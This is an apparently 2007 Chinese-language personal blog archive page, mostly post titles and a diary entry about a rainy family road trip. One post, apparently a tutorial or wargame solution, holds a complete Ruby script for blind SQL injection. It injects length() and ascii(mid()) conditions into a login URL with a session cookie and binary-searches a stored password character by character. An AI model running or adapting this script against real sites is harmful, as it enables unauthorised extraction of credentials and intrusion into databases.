MashiMaro's Blog: 2007

2007年12月24日星期一

[+/-] : [Diary] 天阿!!! 居然抽到Wii !!!

張貼者： MashiMaro 於星期一, 12月 17, 2007 0 意見

2007年12月16日星期日

[+/-] : [Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"

張貼者： MashiMaro 於星期五, 12月 14, 2007 0 意見


# Author      : mashimaro
# Last Modify : 2007/12/11

require 'net/http'
require 'net/https'

host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'

http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
 'Cookie' => cookie,
#  'Referer' => 'http://profil.wp.pl/login.html',
#  'Content-Type' => 'application/x-www-form-urlencoded'
}

cmd = 'password';
appear_str = 'Steven Baker';

len = 0;

if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. 判斷回傳長度
while(1)
 resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'', 

headers)
 break if(!data.index(appear_str));
 print 8.chr * len.to_s.length;
 len = len + 1;
 print len.to_s;
end
end


puts '';
i = 1;
print 'str = ';

# Step 2. 找出字串
while(i <= len)  print 80.chr;  resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'', 

headers);
if(data.index(appear_str))
 min = 80;
 max = 127;
else
 min = 32;
 max = 79;
end

while(min != max)
 mid = ((min + max + 1) / 2).to_i;
 print 8.chr;
 print mid.chr;
 str = '  [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
 print str;
 resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +

mid.to_s + '--\'',  headers);
 if(data.index(appear_str))
   min = mid;
 else
  max = mid - 1;
end
 if(min > max)
  puts 'error: min > max';
  exit(0);
 end
 print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end

print 8.chr + min.chr;

i = i + 1;
end

puts "\r\n\r\n" + 'sql brute force search done!!';

2007年12月13日星期四

[+/-] : 2007 第二屆全國大專院校資安技能金盾獎競賽

張貼者： MashiMaro 於星期四, 12月 13, 2007 0 意見

2007年12月10日星期一

[+/-] : [Hacker] SHTML - SSI 技術

張貼者： MashiMaro 於星期一, 12月 10, 2007 0 意見

2007年12月8日星期六

[+/-] : [JavaScript] 從瀏覽器網址列直接設定

張貼者： MashiMaro 於星期六, 12月 08, 2007 0 意見

2007年12月4日星期二

　　這次回外婆家要幫外公慶祝父親節，老爸將開長途車的重責大任交給我。早上連續開了四小時的車，一路上精神飽滿，順利的安全抵達嘉義，沒想到一個不注意，準備進入外婆家門口前的小巷子時，居然陰溝裡翻船－－－輪圈稍微擦到旁邊的矮平台，老爸就毫不留情的罵了出來XD，我妹居然跟著一起嘲笑我Orz。停好車已經中午了，外婆跟大阿姨已經在廚房忙進忙出，老媽下車後就趕緊過去幫忙。
　　吃完午餐跟大家聊了一下天後，小孩子們就跑去二樓無所事事，老妹就建議用筆電看電影。第一部看什麼我已經忘記了，第二部是"邪降"，算是一部噁心片，跟恐怖旅社的類型相同。看完我就昏睡過去了＝＝。一直睡睡睡睡睡，聽說晚上吃蛋糕慶祝的時候，老爸上來叫了我兩次，我完全沒印象Orz，於是，我睡到隔天九點多:$，早餐就是昨天留下來的蛋糕，這樣還算是有慶祝到吧，哈。
　　在邊吃早餐的時候，外面大風大雨，我還以為颱風來了，聽老爸說才知道原來是西南氣流在搞怪。等風雨小了點後，我們準備上路到台中接老妹，車當然還是我來開拉。在高速公路上，我才真正體驗到什麼叫做狂風暴雨，雨刷開到最快還是刷不清楚，能見度非常低，只能大燈霧燈閃黃燈全開來警示後面的車子，有時旁邊車道有車子，水花就毫不留情的濺在擋風玻璃上，瞬間前方的東西完全模糊，而開過積水時車速會大減，如果緊張隨便亂轉方向盤就掰掰了。還好最後有驚無險的到達大阿姨家，不過我停車技術還是很遜，還是靠老爸親自出馬才ok。
　　在台中吃了麥當勞當中餐，因為阿姨家在趕工作，就沒留下來吃大北京了，那可是每次去台中必吃得餐廳耶XD，於是就啟程回台北了。越往北，風雨就越來越沒那麼大的，甚至還出太陽，雖然如此，老妹還是在車上哇哇叫，說下雨天我開車不安全，我就笑她是沒見過"大風大雨"的人:p。到了台北，媽媽就提議到蘆洲的餐廳吃晚餐，是她公司之前聚餐過的地方，跟大北京蠻像的，就這樣劃下了驚險刺激高速公路之旅的句點。...
read more

2007年8月2日星期四

[+/-] : [XD] 白爛的英文翻譯

張貼者： MashiMaro 於星期四, 8月 02, 2007 0 意見

2007年7月30日星期一

[+/-] : What a Surprise !

張貼者： MashiMaro 於星期一, 7月 30, 2007 0 意見

2007年7月24日星期二

[+/-] : [Math] 中國餘數定理

張貼者： MashiMaro 於星期二, 7月 24, 2007 0 意見

[+/-] : 友達「點亮夢想陪他成長」公益活動

張貼者： MashiMaro 於星期二, 7月 24, 2007 0 意見

2007年7月7日星期六

[+/-] : 光華半日遊

張貼者： MashiMaro 於星期六, 7月 07, 2007 0 意見

2007年7月6日星期五

[+/-] : Day -1 @ DSNS

張貼者： MashiMaro 於星期五, 7月 06, 2007 0 意見

[+/-] : [Funny]結婚前.後

張貼者： MashiMaro 於星期五, 7月 06, 2007 0 意見

2007年7月5日星期四

[+/-] : My First Blog!!

張貼者： MashiMaro 於星期四, 7月 05, 2007 0 意見

訂閱：文章 (Atom)

MashiMaro's Blog

Archives

BloggerAds

WHO'S

About Me

2007年12月24日 星期一

[+/-] : [LittleGame] 塔防

2007年12月18日 星期二

[+/-] : Windows 資料夾權限加密解除辦法

[+/-] : [Diary] 我和白痴妹

2007年12月17日 星期一

[+/-] : [Diary] 天阿!!! 居然抽到Wii !!!

2007年12月16日 星期日

[+/-] : [LittleGame] 有難度的塔防

2007年12月14日 星期五

[+/-] : [Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"

2007年12月13日 星期四

[+/-] : 2007 第二屆 全國大專院校 資安技能金盾獎競賽

2007年12月10日 星期一

[+/-] : [Perl] 開讀檔

[+/-] : [Hacker] RainbowCrack

[+/-] : [Hacker] SHTML - SSI 技術

2007年12月8日 星期六

[+/-] : [Hacker] 常用脫殼工具

[+/-] : [JavaScript] 從瀏覽器網址列直接設定

2007年12月4日 星期二

[+/-] : [免費軟體][Windows] TFTP

2007年12月3日 星期一

[+/-] : [Perl] postHTMLsock

[+/-] : [Perl] getHTMLsock

[+/-] : [Format]GIF

[+/-] : [Format]PNG

2007年8月21日 星期二

[+/-] : 搶救童玩節連署活動

2007年8月19日 星期日

[+/-] : [MV]不能說的秘密

2007年8月11日 星期六

[+/-] : 高速公路新體驗

2007年8月2日 星期四

[+/-] : [XD] 白爛的英文翻譯

2007年7月30日 星期一

[+/-] : What a Surprise !

2007年7月24日 星期二

[+/-] : [Math] 中國餘數定理

[+/-] : 友達「點亮夢想 陪他成長」公益活動

2007年7月7日 星期六

[+/-] : 光華半日遊

2007年7月6日 星期五

[+/-] : Day -1 @ DSNS

[+/-] : [Funny]結婚前.後

2007年7月5日 星期四

[+/-] : My First Blog!!

Labels

Google Search

常逛的網誌

2007年12月24日星期一

2007年12月18日星期二

2007年12月17日星期一